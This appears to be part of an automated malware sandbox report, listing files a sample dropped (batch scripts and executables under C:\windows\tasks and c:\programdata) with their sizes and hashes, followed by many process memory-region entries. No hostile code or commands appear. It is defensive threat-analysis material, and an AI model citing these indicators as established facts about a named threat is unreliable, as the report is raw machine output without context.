SHA512c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8
-
C:\windows\tasks\run.batFilesize
338B
MD520a377ca25c7fcdff75b3720ba83e11c
SHA1ad3ceb92df33714c7d3f517a77b1086797d72c47
SHA256280e5ccacd1622f61cfd675f4ae1204790bd5aea648d0e51145d01a772d792ad
SHA512b4f2d5a1c8cbdfd7cc3f6d106735e816572bb0a177b302263fa9267625bca7d77f49b5e86252c3632ce9e05e4e5ba7730e7555ac465ed5b46f913de4739cecc6
-
\??\c:\programdata\migrate.exeFilesize
6.6MB
MD54d877cab8a19afea517ba4436805ce77
SHA17210160bd527a3b726ad0686613bff358823de41
SHA256e2eee92ef0ffc25134049dd0301d464bf8e7b814ba04b25749dea8c0b7cbc29d
SHA512af9ce52af8d3a6987eb50fd17cbae170195872e8ca2d65db5198842f185d4cba2b70e9d2d0e9cdeb1cb80bd1adaf1674eec84797d65a8c2e236b18261fe018bc
-
\??\c:\programdata\st.batFilesize
3KB
MD5d7c8216954b5eb6037dd1a45dd57a4f0
SHA1a7edc98e44c55070d28941bfc9f7d88a95576041
SHA256cf5405b85d6f3e6365707af3302610d84596c23f0f7717c43eb11c1ac702bce7
SHA5123338f2c096137b568cf1f3ac1ae6ab4be2b2baa7ed08aaa4b7fe6b72ddca231d456a3fa41c817b6dc14abc62c062a390a440b8a3fc6a1ab5243f7f4fc12f29af
-
\??\c:\programdata\wsappy.exeFilesize
3.8MB
MD59a1d9fe9b1223273c314632d04008384
SHA1665cad3ed21f6443d1adacf18ca45dfaa8f52c99
SHA2560f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359
SHA5123ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5
-
memory/432-276-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/432-219-0x0000000000000000-mapping.dmp
-
memory/432-239-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/460-238-0x0000000000180000-0x00000000011D9000-memory.dmpFilesize
16.3MB
-
memory/460-197-0x0000000000180000-0x00000000011D9000-memory.dmpFilesize
16.3MB
-
memory/460-198-0x0000000000180000-0x00000000011D9000-memory.dmpFilesize
16.3MB
-
memory/460-195-0x0000000000000000-mapping.dmp
-
memory/732-420-0x0000000000000000-mapping.dmp
-
memory/1120-230-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/1120-266-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/1120-213-0x0000000000000000-mapping.dmp
-
memory/1188-176-0x0000000000000000-mapping.dmp
-
memory/1240-202-0x0000000000000000-mapping.dmp
-
memory/1328-158-0x0000000000000000-mapping.dmp
-
memory/1440-265-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/1440-223-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/1440-224-0x000002EF2D860000-0x000002EF2D882000-memory.dmpFilesize
136KB
-
memory/1440-208-0x0000000000000000-mapping.dmp
-
memory/1460-491-0x0000014899765000-0x0000014899769000-memory.dmpFilesize
16KB
-
memory/1460-323-0x0000014896980000-0x00000148969A0000-memory.dmpFilesize
128KB
-
memory/1460-317-0x00000148969C0000-0x00000148969E0000-memory.dmpFilesize
128KB
-
memory/1460-319-0x00000148A9780000-0x00000148A9880000-memory.dmpFilesize
1024KB
-
memory/1460-498-0x0000014899769000-0x000001489976C000-memory.dmpFilesize
12KB
-
memory/1460-335-0x00000148969C0000-0x00000148969E0000-memory.dmpFilesize
128KB
-
memory/1460-435-0x00000148AC8B8000-0x00000148AC8C0000-memory.dmpFilesize
32KB
-
memory/1460-436-0x000001489976A000-0x000001489976E000-memory.dmpFilesize
16KB
-
memory/1460-437-0x000001489976A000-0x000001489976E000-memory.dmpFilesize
16KB
-
memory/1460-497-0x0000014899769000-0x000001489976C000-memory.dmpFilesize
12KB
-
memory/1460-438-0x000001489976A000-0x000001489976E000-memory.dmpFilesize
16KB
-
memory/1460-499-0x0000014899769000-0x000001489976C000-memory.dmpFilesize
12KB
-
memory/1460-439-0x000001489976A000-0x000001489976E000-memory.dmpFilesize
16KB
-
memory/1460-440-0x000001489976A000-0x000001489976E000-memory.dmpFilesize
16KB
-
memory/1460-489-0x0000014899765000-0x0000014899769000-memory.dmpFilesize
16KB
-
memory/1460-490-0x0000014899765000-0x0000014899769000-memory.dmpFilesize
16KB
-
memory/1460-492-0x0000014899765000-0x0000014899769000-memory.dmpFilesize
16KB
-
memory/1460-496-0x0000014899769000-0x000001489976C000-memory.dmpFilesize
12KB
-
memory/1476-231-0x0000000074E50000-0x0000000074E9C000-memory.dmpFilesize
304KB
-
memory/1476-203-0x0000000000000000-mapping.dmp
-
memory/1512-241-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/1512-274-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/1512-220-0x0000000000000000-mapping.dmp
-
memory/1588-226-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/1588-209-0x0000000000000000-mapping.dmp
-
memory/1588-259-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/1640-167-0x0000000000000000-mapping.dmp
-
memory/1708-166-0x0000000000000000-mapping.dmp
-
memory/1720-234-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/1720-216-0x0000000000000000-mapping.dmp
-
memory/1720-270-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/2060-248-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/2060-221-0x0000000000000000-mapping.dmp
-
memory/2060-279-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/2104-262-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/2104-227-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/2104-210-0x0000000000000000-mapping.dmp
-
memory/2124-275-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/2124-215-0x0000000000000000-mapping.dmp
-
memory/2124-233-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/2240-201-0x0000000000000000-mapping.dmp
-
memory/2316-283-0x0000000000000000-mapping.dmp
-
memory/2416-193-0x0000000000000000-mapping.dmp
-
memory/2848-229-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/2848-212-0x0000000000000000-mapping.dmp
-
memory/2848-268-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/3300-303-0x0000000000000000-mapping.dmp
-
memory/3416-170-0x0000000000000000-mapping.dmp
-
memory/3500-177-0x0000000000000000-mapping.dmp
-
memory/3560-217-0x0000000000A80000-0x0000000001AD9000-memory.dmpFilesize
16.3MB
-
memory/3560-302-0x0000000000A80000-0x0000000001AD9000-memory.dmpFilesize
16.3MB
-
memory/3560-205-0x0000000000A80000-0x0000000001AD9000-memory.dmpFilesize
16.3MB
-
memory/3564-179-0x0000000000000000-mapping.dmp
-
memory/3708-175-0x0000000000000000-mapping.dmp
-
memory/3736-180-0x0000000000000000-mapping.dmp
-
memory/3752-173-0x0000000000000000-mapping.dmp
-
memory/3792-182-0x0000000000000000-mapping.dmp
-
memory/3792-298-0x0000000000000000-mapping.dmp
-
memory/3844-181-0x0000000000000000-mapping.dmp
-
memory/3936-218-0x0000000000000000-mapping.dmp
-
memory/3936-247-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/3936-272-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/4060-192-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/4060-191-0x0000000000220000-0x000000000032C000-memory.dmpFilesize
1.0MB
-
memory/4060-228-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/4060-194-0x000000001CA70000-0x000000001CAC0000-memory.dmpFilesize
320KB
-
memory/4060-188-0x0000000000000000-mapping.dmp
-
memory/4408-186-0x0000000000000000-mapping.dmp
-
memory/4416-154-0x0000000000000000-mapping.dmp
-
memory/4572-132-0x0000000000000000-mapping.dmp
-
memory/4572-135-0x00000000052C0000-0x00000000052E2000-memory.dmpFilesize
136KB
-
memory/4572-133-0x0000000002DA0000-0x0000000002DD6000-memory.dmpFilesize
216KB
-
memory/4572-134-0x0000000005470000-0x0000000005A98000-memory.dmpFilesize
6.2MB
-
memory/4572-136-0x0000000005AA0000-0x0000000005B06000-memory.dmpFilesize
408KB
-
memory/4572-137-0x0000000005B10000-0x0000000005B76000-memory.dmpFilesize
408KB
-
memory/4572-138-0x0000000006150000-0x000000000616E000-memory.dmpFilesize
120KB
-
memory/4572-139-0x00000000072D0000-0x0000000007302000-memory.dmpFilesize
200KB
-
memory/4572-140-0x000000006EED0000-0x000000006EF1C000-memory.dmpFilesize
304KB
-
memory/4572-141-0x00000000072B0000-0x00000000072CE000-memory.dmpFilesize
120KB
-
memory/4572-148-0x0000000007770000-0x0000000007778000-memory.dmpFilesize
32KB
-
memory/4572-147-0x0000000007790000-0x00000000077AA000-memory.dmpFilesize
104KB
-
memory/4572-146-0x0000000007680000-0x000000000768E000-memory.dmpFilesize
56KB
-
memory/4572-142-0x0000000007A90000-0x000000000810A000-memory.dmpFilesize
6.5MB
-
memory/4572-143-0x0000000007450000-0x000000000746A000-memory.dmpFilesize
104KB
-
memory/4572-144-0x00000000074C0000-0x00000000074CA000-memory.dmpFilesize
40KB
-
memory/4572-145-0x00000000076D0000-0x0000000007766000-memory.dmpFilesize
600KB
-
memory/4584-161-0x0000000000000000-mapping.dmp
-
memory/4596-174-0x0000000000000000-mapping.dmp
-
memory/4692-168-0x0000000000000000-mapping.dmp
-
memory/4772-178-0x0000000000000000-mapping.dmp
-
memory/4808-184-0x0000000000000000-mapping.dmp
-
memory/4860-157-0x0000000000000000-mapping.dmp
-
memory/4888-153-0x000000006EED0000-0x000000006EF1C000-memory.dmpFilesize
304KB
-
memory/4888-149-0x0000000000000000-mapping.dmp
-
memory/4948-207-0x0000000000000000-mapping.dmp
-
memory/4948-236-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/4948-269-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/4992-242-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/4992-222-0x0000000000000000-mapping.dmp
-
memory/4992-277-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/5016-225-0x0000000000000000-mapping.dmp
-
memory/5124-465-0x0000000000000000-mapping.dmp
-
memory/5356-237-0x0000000000A80000-0x0000000001AD9000-memory.dmpFilesize
16.3MB
-
memory/5356-246-0x0000000000A80000-0x0000000001AD9000-memory.dmpFilesize
16.3MB
-
memory/5356-308-0x0000000000A80000-0x0000000001AD9000-memory.dmpFilesize
16.3MB
-
memory/5400-280-0x0000000000000000-mapping.dmp
-
memory/5400-286-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/5400-351-0x00007FFF3B0F0000-0x00007FFF3BBB1000-memory.dmpFilesize
10.8MB
-
memory/5400-501-0x000000001FB50000-0x000000001FD12000-memory.dmpFilesize
1.8MB
-
memory/5428-284-0x0000000000000000-mapping.dmp
-
memory/5540-306-0x0000000000A80000-0x0000000001AD9000-memory.dmpFilesize
16.3MB
-
memory/5540-290-0x0000000000A80000-0x0000000001AD9000-memory.dmpFilesize
16.3MB
-
memory/5540-287-0x0000000000000000-mapping.dmp
-
memory/5556-448-0x0000000000000000-mapping.dmp
-
memory/5568-495-0x0000000000A80000-0x0000000001AD9000-memory.dmpFilesize
16.3MB
-
memory/5568-484-0x0000000000A80000-0x0000000001AD9000-memory.dmpFilesize
16.3MB
-
memory/5624-289-0x0000000000000000-mapping.dmp
-
memory/5640-502-0x00000243B1DB0000-0x00000243B1DD0000-memory.dmpFilesize
128KB
-
memory/5640-503-0x00000243B21E0000-0x00000243B2220000-memory.dmpFilesize
256KB
-
memory/5692-285-0x0000000000000000-mapping.dmp
-
memory/5724-244-0x0000000000000000-mapping.dmp
-
memory/5856-292-0x0000000000000000-mapping.dmp
-
memory/5952-307-0x0000000000000000-mapping.dmp
-
memory/5956-249-0x0000000000000000-mapping.dmp
-
memory/5964-301-0x0000000000000000-mapping.dmp
-
memory/5980-251-0x0000000000000000-mapping.dmp
-
memory/5992-252-0x0000000000000000-mapping.dmp
-
memory/6012-299-0x0000000000000000-mapping.dmp
-
memory/6016-300-0x0000000000000000-mapping.dmp
-
memory/6044-253-0x0000000000000000-mapping.dmp
-
memory/6064-254-0x0000000000000000-mapping.dmp